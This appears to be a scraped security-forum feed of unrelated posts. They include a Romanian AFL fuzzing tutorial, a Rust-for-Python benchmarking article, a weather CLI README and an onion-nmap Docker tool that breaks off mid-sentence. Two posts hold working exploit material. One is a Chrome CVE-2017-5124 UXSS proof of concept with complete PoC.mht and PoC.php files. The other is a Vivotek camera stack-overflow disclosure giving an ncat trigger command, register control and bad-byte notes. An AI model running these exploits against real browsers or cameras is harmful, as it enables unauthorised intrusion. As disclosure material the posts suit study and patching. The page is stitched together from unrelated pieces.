Leaderboard

Limbaje de asamblare - Indrumator de laborator vol 1 and 2: Imi pare rau de calitatea paginilor scanate, si fontul cartii este putin mai ciudat. Nici continutul nu este asa de bun, dar contine multe exemple! Descarcare: https://www62.zippyshare.com/v/GHOLsgEP/file.html

Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. - In timpul acestui tutorial mi-am dat seama ca mai am nevoie de pachetele po4a, libtool, texi2html. sudo apt install po4a libtool texi2html Folosesc American Fuzzy Lop (afl). - http://lcamtuf.coredump.cx/afl/' $ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz $ tar xf afl-latest.tgz $ cd afl-2.39b/ $ make $ sudo make install Ca să vedeți dacă s-a intalat cu succes puteți verifica tastând afl-gcc $ afl-gcc afl-cc 2.39b by <lcamtuf@google.com> This is a helper application for afl-fuzz. It serves as a drop-in replacement for gcc or clang, letting you recompile third-party code with the required runtime instrumentation. A common use pattern would be one of the following: CC=/usr/local/bin/afl-gcc ./configure CXX=/usr/local/bin/afl-g++ ./configure You can specify custom next-stage toolchain via AFL_CC, AFL_CXX, and AFL_AS. Setting AFL_HARDEN enables hardening optimizations in the compiled code. În principiu acest program se așteaptă ca ținta testată să citească fișiere. Să zicem că vrem să testăm utilitarul "wc" (utilitar care numără linii în linux). man wc .. derulăm până jos cu SHIFT-G .. [..] GNU coreutils 8.25 Bun am aflat că wc face parte din pachetul coreutils. Hai să luam sursa de coreutils și să o compilăm Din moment ce folosesc ubuntu server o caut direct pe repo-urile canonical. O găsesc aici $ wget http://archive.ubuntu.com/ubuntu/pool/main/c/coreutils/coreutils_8.25.orig.tar.xz $ tar xf coreutils_8.25.orig.tar.xz $ cd coreutils-8.25/ $ CC=afl-gcc ./configure $ make Bun. Acum am compilat utilitarul pe care vrem sa il testam cu afl-gcc. Hai să verificăm dacă chiar au fost adăugate simbolurile fuzzerului. $ cd src/ $ strings ./wc | grep -i afl [..] __afl_fork_pid .AFL_VARS __afl_global_area_ptr Totul e în regulă deci. Hai să verificăm că programul nostru chiar merge. $ ./wc /etc/passwd 33 48 1740 /etc/passwd Fuzzerul are nevoie de două foldere. Unul pentru input altrul pentru output. $ mkdir in/ $ mkdir out/ $ echo "test" > in/input $ echo "test2" >> in/input # testam $ ./wc in/input 2 2 11 in/input Acum hai să pornim o rulare. $ afl-fuzz -i in/ -o out/ ./wc @@ american fuzzy lop 2.39b (wc) lq process timing qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqwq overall results qqqqqk x run time : 0 days, 0 hrs, 0 min, 5 sec x cycles done : 0 x x last new path : 0 days, 0 hrs, 0 min, 2 sec x total paths : 58 x x last uniq crash : none seen yet x uniq crashes : 0 x x last uniq hang : none seen yet x uniq hangs : 0 x tq cycle progress qqqqqqqqqqqqqqqqqqqqwq map coverage qvqqqqqqqqqqqqqqqqqqqqqqqu x now processing : 0 (0.00%) x map density : 0.23% / 0.25% x x paths timed out : 0 (0.00%) x count coverage : 1.92 bits/tuple x tq stage progress qqqqqqqqqqqqqqqqqqqqnq findings in depth qqqqqqqqqqqqqqqqqqqqu x now trying : havoc x favored paths : 1 (1.72%) x x stage execs : 21.6k/32.8k (65.87%) x new edges on : 8 (13.79%) x x total execs : 23.7k x total crashes : 0 (0 unique) x x exec speed : 3591/sec x total hangs : 0 (0 unique) x tq fuzzing strategy yields qqqqqqqqqqqvqqqqqqqqqqqqqqqwq path geometry qqqqqqqqu x bit flips : 8/88, 1/87, 1/85 x levels : 2 x x byte flips : 0/11, 1/10, 4/8 x pending : 58 x x arithmetics : 1/616, 0/75, 0/0 x pend fav : 1 x x known ints : 0/62, 3/280, 3/352 x own finds : 57 x x dictionary : 0/0, 0/0, 0/0 x imported : n/a x x havoc : 0/0, 0/0 x stability : 100.00% x x trim : 0.00%/2, 0.00% tqqqqqqqqqqqqqqqqqqqqqqqqj ^Cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj [cpu000: 44%] O să găsiți inputurile care crapă programul în ./out/crashes și cele care îl blochează în ./out/hangs. Have fun

What is Rust? Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring zero-cost abstractions move semantics guaranteed memory safety threads without data races trait-based generics pattern matching type inference minimal runtime efficient C bindings Description is taken from rust-lang.org. Why does it matter for a Python developer? The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There is a bunch of Rust packages out there to help you extending Python with Rust. I can mention Milksnake created by Armin Ronacher (the creator of Flask) and also PyO3 The Rust bindings for Python interpreter. See a complete reference list at the bottom of this article. Let’s see it in action For this post, I am going to use Rust Cpython, it’s the only one I have tested, it is compatible with stable version of Rust and found it straightforward to use. Pros: It is easy to write Rust functions and import from Python and as you will see by the benchmarks it worth in terms of performance. Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture, there will be a compiling stage which you don’t have when installing Pure Python libraries, you can make it easier using rust-setuptools or using the MilkSnake to embed binary data in Python Wheels. Python is sometimes slow Yes, Python is known for being “slow” in some cases and the good news is that this doesn’t really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance, often happens with string parsing and image processing. Example Let’s say you have a Python function which does a string processing, take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python. # How many subsequent-repeated group of chars are in the given string? abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here} 1 2 3 4 5 6 Python is slow for doing large string processing, so you can use pytest-benchmark to compare a Pure Python (with Iterator Zipping) function versus a Regexp implementation. # Using a Python3.6 environment $ pip3 install pytest pytest-benchmark Then write a new Python program called doubles.py import re import string import random # Python ZIP version def count_doubles(val): total = 0 # there is an improved version later on this post for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total # Python REGEXP version double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) # Benchmark it # generate 1M of random letters to test it val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) Run pytest to compare: $ pytest doubles.py ============================================================================= platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 2 items doubles.py .. ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_regex 24.6824 (1.0) 32.3960 (1.0) 27.0167 (1.0) test_pure_python 51.4964 (2.09) 62.5680 (1.93) 52.8334 (1.96) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Regexp – 27.0167 <– less is better Python Zip – 52.8334 Extending Python with Rust Create a new crate crate is how we call Rust Packages. Having rust installed (recommended way is Rust is https://www.rustup.rs/ )also available on Fedora and RHEL repositories by the rust-toolset I used rustc 1.21.0 In the same folder run: cargo new pyext-myrustlib It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation). Edit Cargo.toml It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python. [package] name = "pyext-myrustlib" version = "0.1.0" authors = ["Bruno Rocha <rochacbruno@gmail.com>"] [lib] name = "myrustlib" crate-type = ["dylib"] [dependencies.cpython] version = "0.1" features = ["extension-module"] Edit src/lib.rs What we need to do: Import all macros from cpython crate. Take Python and PyResult types from CPython into our lib scope. Write the count_doubles function implementation in Rust, note that this is very similar to the Pure Python version except for: It takes a Python as first argument, which is a reference to the Python Interpreter and allows Rust to use the Python GIL. Receives a &str typed val as reference. Returns a PyResult which is a type that allows the rise of Python exceptions. Returns an PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)) and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok on that type. (note that our PyResult expects a u64 as return value). Using py_module_initializer! macro we register new attributes to the lib, including the __doc__ and also we add the count_doubles attribute referencing our Rust implementation of the function. Attention to the names libmyrustlib, initlibmyrustlib, and PyInit. We also use the try! macro, which is the equivalent to Python’stry.. except. Return Ok(()) – The () is an empty result tuple, the equivalent of None in Python. #[macro_use] extern crate cpython; use cpython::{Python, PyResult}; fn count_doubles(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; // There is an improved version later on this post for (c1, c2) in val.chars().zip(val.chars().skip(1)) { if c1 == c2 { total += 1; } } Ok(total) } py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | { try!(m.add(py, "__doc__", "This module is implemented in Rust")); try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str)))); Ok(()) }); Now let’s build it with cargo $ cargo build --release Finished release [optimized] target(s) in 0.0 secs $ ls -la target/release/libmyrustlib* target/release/libmyrustlib.d target/release/libmyrustlib.so* <-- Our dylib is here Now let’s copy the generated .so lib to the same folder where our doubles.py is located. NOTE: on Fedora you must get a .so in other system you may get a .dylib and you can rename it changing extension to .so. $ cd .. $ ls doubles.py pyext-myrustlib/ $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so $ ls doubles.py myrustlib.so pyext-myrustlib/ Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as it was a Python module. Importing from Python and comparing the results Edit your doubles.py now importing our Rust implemented version and adding a benchmark for it. import re import string import random import myrustlib # <-- Import the Rust implemented module (myrustlib.so) def count_doubles(val): """Count repeated pair of chars ins a string""" total = 0 for c1, c2 in zip(val, val[1:]): if c1 == c2: total += 1 return total double_re = re.compile(r'(?=(.)\1)') def count_doubles_regex(val): return len(double_re.findall(val)) val = ''.join(random.choice(string.ascii_letters) for i in range(1000000)) def test_pure_python(benchmark): benchmark(count_doubles, val) def test_regex(benchmark): benchmark(count_doubles_regex, val) def test_rust(benchmark): # <-- Benchmark the Rust version benchmark(myrustlib.count_doubles, val) Benchmark $ pytest doubles.py ============================================================================== platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4. benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round rootdir: /Projects/rustpy, inifile: plugins: benchmark-3.1.1 collected 3 items doubles.py ... ----------------------------------------------------------------------------- Name (time in ms) Min Max Mean ----------------------------------------------------------------------------- test_rust 2.5555 (1.0) 2.9296 (1.0) 2.6085 (1.0) test_regex 25.6049 (10.02) 27.2190 (9.29) 25.8876 (9.92) test_pure_python 52.9428 (20.72) 56.3666 (19.24) 53.9732 (20.69) ----------------------------------------------------------------------------- Lets take the Mean for comparison: Rust – 2.6085 <– less is better Regexp – 25.8876 Python Zip – 53.9732 Rust implementation can be 10x faster than Python Regex and 21x faster than Pure Python Version. Interesting that Regex version is only 2x faster than Pure Python ? NOTE: That numbers makes sense only for this particular scenario, for other cases that comparison may be different. Updates and Improvements After this article has been published I got some comments on r/python and also on r/rust The contributions came as Pull Requests and you can send a new if you think the functions can be improved. Thanks to: Josh Stone we got a better implementation for Rust which iterates the string only once and also the Python equivalent. Thanks to: Purple Pixie we got a Python implementation using itertools, however this version is not performing any better and still needs improvements. Iterating only once fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> { let mut total = 0u64; let mut chars = val.chars(); if let Some(mut c1) = chars.next() { for c2 in chars { if c1 == c2 { total += 1; } c1 = c2; } } Ok(total) } def count_doubles_once(val): total = 0 chars = iter(val) c1 = next(chars) for c2 in chars: if c1 == c2: total += 1 c1 = c2 return total Python with itertools import itertools def count_doubles_itertools(val): c1s, c2s = itertools.tee(val) next(c2s, None) total = 0 for c1, c2 in zip(c1s, c2s): if c1 == c2: total += 1 return total New Results ------------------------------------------------------------------------------- Name (time in ms) Min Max Mean ------------------------------------------------------------------------------- test_rust_once 1.0072 (1.0) 1.7659 (1.0) 1.1268 (1.0) test_rust 2.6228 (2.60) 4.5545 (2.58) 2.9367 (2.61) test_regex 26.0261 (25.84) 32.5899 (18.45) 27.2677 (24.20) test_pure_python_once 38.2015 (37.93) 43.9625 (24.90) 39.5838 (35.13) test_pure_python 52.4487 (52.07) 59.4220 (33.65) 54.8916 (48.71) test_itertools 58.5658 (58.15) 66.0683 (37.41) 60.8705 (54.02) ------------------------------------------------------------------------------- The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure python After adding the improvements to iterate the list of chars only once, Rust still has advantage from 1.1268 to 39.583 Conclusion Rust may not be yet the general purpose language of choice by its level of complexity and may not be the better choice yet to write common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of others crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth to keep an eye open to the future! References The code snippets for the examples showed here are available in GitHub repo: https://github.com/rochacbruno/rust-python-example. The examples in this publication are inspired by Extending Python with Rust talk by Samuel Cormier-Iijima in Pycon Canada. video here: Also by My Python is a little Rust-y by Dan Callahan in Pycon Montreal. video here: Other references: https://github.com/mitsuhiko/snaek https://github.com/PyO3/pyo3 https://pypi.python.org/pypi/setuptools-rust https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish http://jakegoulding.com/rust-ffi-omnibus/ https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs https://bheisler.github.io/post/calling-rust-in-python/ https://github.com/saethlin/rust-lather Join Community Join Rust community, you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you to join https://t.me/rustlangbr and there is the http://bit.ly/canalrustbr on Youtube. Author Bruno Rocha Senior Quality Engineer at Red Hat Teaching Python and Flask at CursoDePython.com.br Fellow Member of Python Software Foundation Member of RustBR study group M0ore info: http://about.me/rochacbruno and http://brunorocha.org Source

you know how to decode it : ZjJhNWQ1YjhlOTI2MmY2MzFjYTZjMDFiMGQ0ZDgwMGQ=

Audiobooks in romana/engle

@Narcos2018 download

Article: https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy Press: https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html Source: VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

Daca ar durea prostia... te-ai zvarcoli pe jos.. @yoyois, ti-ai gasit si tu cu cine sa faci conversatie

Se duce dracu.... insa iti raman datele de pe ssd. Data viitoare cand esti nervos da-te cu capu de un perete de beton.

@yoyois @adicode Daca totul e 100% legal sau, mai bine zis, totul e 100% transparent si public si toata lumea stie tot fiindca totul e la liber, atunci cum se explica stirile postate tot pe aici in care unii au gasit nu stiu ce bug in btc si apoi in eth de ordinul miliardelor de dolari parca (cred ca milarde era vorba). Pai nu se vede de la o posta si daca se face o tranzactie de 0.001$ (in btc sau eth) de la cine si unde se duce ? Pai atunci, un milion de dolari sau, si mai mult, un milard de dolari, nu e vizibil unde s-a dus ? Atunci cum e cu transparenta asta de 100% daca pe tine te poate despista pentru 10 dolari iar pe aia ca au dat un tun de un miliard (sau hai sa zicem si un milion) de dolari, alora nu le poate da nimeni de urma ? Brusc nu mai e transparenta ca nu inteleg cum au putut sa "evapore" ditamai banetu' ? P.S. Articolele sunt postate pe RST, nu le mai gasesc, dar la un search cred ca iti apar.

Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit. Download CVE-2017-5124-master.zip Content: PoC.mht PoC.php README.md Mirror: README.md # CVE-2017-5124 ### UXSS with MHTML DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100) PoC.php <?php $filename=realpath("PoC.mht"); header( "Content-type: multipart/related"); readfile($filename); ?> PoC.mht MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com <script>alert('Location origin: '+location.origin)</script> ------MultipartBoundary---- Source

Awesome Coding Videos Learn to code by watching free awesome video courses Source: www.awesomecodingvideos.com

Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101. [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX] Source

weather Weather via the command line. Uses the darksky.net API so it's super accurate. Also includes any current weather alerts in the output. Installation Binaries darwin 386 / amd64 freebsd 386 / amd64 linux 386 / amd64 / arm / arm64 solaris amd64 windows 386 / amd64 Via Go $ go get github.com/jessfraz/weather Usage --location, -l: Your address, can be in the format of just a zipcode or a city, state, or the full address. defaults to auto locating you based off your ip --units, -u: The unit system to use. defaults to auto, other options are us, si, uk, uk2, ca for more information on units see the darksky.net api --days, -d: Days of weather to retrieve. defaults to the current weather, ie. 0 or 1 --ignore-alerts: Don't print alerts in weather output. defaults false --hide-icon: Hide the weather icons from being output. defaults false --server, -s: Weather API server uri defaults to "https://geocode.jessfraz.com" Examples # get the current weather in your current location $ weather # change the units to metric $ weather -l "Paris, France" -u si # it will auto guess the units though so changing # the location to paris will change the units to `si` $ weather -l "Paris, France" # get three days forecast for NY $ weather -l 10028 -d 3 # or you can autolocate and get three days forecast $ weather -d 3 # get the weather in Manhattan Beach, CA # even includes alerts $ weather -l "Manhattan Beach, CA" # .;odc # ;kXNNNO # .0NNO0NN: # 'XNK; dNNl # KNX' 'XNK. # ,NNk cXNK, # ,NNk '0NNO:. # .'cXNXl;,. ,xXNNKOxxxk0Xx # 'lOXNNNNNNNNNNXOo' ':oxkOXNNXc # cKNNKd:'. ..;d0NNKl ,xXNK, # .;:cclKNXd. .oXNXxOXNNXl # .cOXNNNNNNNO. .kNNNNNNNXOc. # lXNXx;. . . .;dXNXo # ONNd. oXN0. # dNNo cNNk # XNN. NNX # 0NN' .NNK # ;XN0. .ONNc # ;XNXo. .lXNX: # .oXNX0dlcclx0Xo. .oXKxlccldOXNXd. # ,lk0KXXK0xKNN0o;.. ..;o0NNKx0KXXX0ko, # 'lOXNNNNNNNNNNXOo, # :x0XNNX0x:. # # # Current weather is Partly Cloudy in Manhattan Beach in California for July 14 at 4:14am EDT # The temperature is 69.2°F, but it feels like 69.2°F # # Special Weather Statement for Los Angeles, CA # ...THREAT OF MONSOONAL THUNDERSTORMS LATE TONIGHT THROUGH WEDNESDAY... # A STRONG UPPER LEVEL HIGH PRESSURE SYSTEM CURRENTLY CENTERED OVER NEVADA # WILL BRING INCREASING EAST TO SOUTHEAST FLOW OVER SOUTHERN # CALIFORNIA. AS A RESULT...A SIGNIFICANT SURGE OF MONSOONAL MOISTURE # WILL MOVE INTO SOUTHWEST CALIFORNIA LATE TONIGHT THROUGH WEDNESDAY. # THE GREATEST THREAT OF SHOWERS AND THUNDERSTORMS WILL BE ACROSS THE # MOUNTAINS AND ANTELOPE VALLEY LATE TONIGHT INTO TUESDAY. DUE TO THE # EASTERLY UPPER LEVEL FLOW ON MONDAY...THERE WILL ALSO BE A SLIGHT # CHANCE OF SHOWERS AND THUNDERSTORMS ACROSS MOST COASTAL AND VALLEY # AREAS. # THE DEEPER MONSOONAL MOISTURE WILL BRING THE POTENTIAL FOR BRIEF HEAVY # RAINFALL WITH STORMS THAT DEVELOP ON MONDAY AND TUESDAY...ESPECIALLY # ACROSS THE MOUNTAINS AND ANTELOPE VALLEY. WHILE STORMS ARE EXPECTED # TO BE FAST MOVING...THERE WILL BE THE POTENTIAL FOR LOCALIZED FLOODING # OF ROADWAYS AND ARROYOS. ON TUESDAY...THE THREAT OF THUNDERSTORMS IS # EXPECTED TO REMAIN CONFINED TO THE MOUNTAINS AND DESERTS. WITH WEAKER # UPPER LEVEL WINDS ON TUESDAY...STORMS WILL LIKELY MOVE SLOWER. AS A # RESULT...THERE WILL BE AN INCREASED THREAT OF FLASH FLOODING. # IT WILL NOT BE AS HOT ACROSS MUCH OF THE REGION TOMORROW DUE TO THE # INCREASED MOISTURE AND CLOUD COVERAGE...WITH INTERIOR SECTIONS # GENERALLY REMAINING IN THE 90S. HOWEVER...THERE WILL BE A # SIGNIFICANT INCREASE IN HUMIDITY ON MONDAY THAT WILL CONTINUE TO # BRING DISCOMFORT. # ANYONE PLANNING OUTDOOR ACTIVITIES IN THE MOUNTAINS AND DESERTS # DURING THE NEXT FEW DAYS SHOULD CAREFULLY MONITOR THE LATEST # NATIONAL WEATHER SERVICE FORECASTS AND STATEMENTS DUE TO THE # POTENTIAL HAZARDS ASSOCIATED WITH THUNDERSTORMS. # Created: July 13 at 10:50pm EDT # Expires: July 14 at 7:00pm EDT # # Ick! The humidity is 85% # The nearest storm is 18 miles NE away # The wind speed is 3.96 mph SE # The cloud coverage is 35% # The visibility is 9.58 miles # The pressure is 1012.99 mbar Makefile Usage $ make help all Runs a clean, build, fmt, lint, test, vet and install build Builds a dynamic executable or package clean Cleanup any build binaries or packages cross Builds the cross compiled binaries, creating a clean directory structure (eg. GOOS/GOARCH/binary) fmt Verifies all files have men `gofmt`ed install Installs the executable or package lint Verifies `golint` passes release Builds the cross compiled binaries, naming them in such a way for release (eg. binary-GOOS-GOARCH) tag Create a new git tag to prepare to build a release test Runs the go tests vet Verifies `go vet` passes Download weather-master.zip Source

Step aside python \o/. Meanwhile, curl wttr.in/Tokyo

Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. docker-onion-nmap Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses. Example: $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.7s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments: By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this: docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or 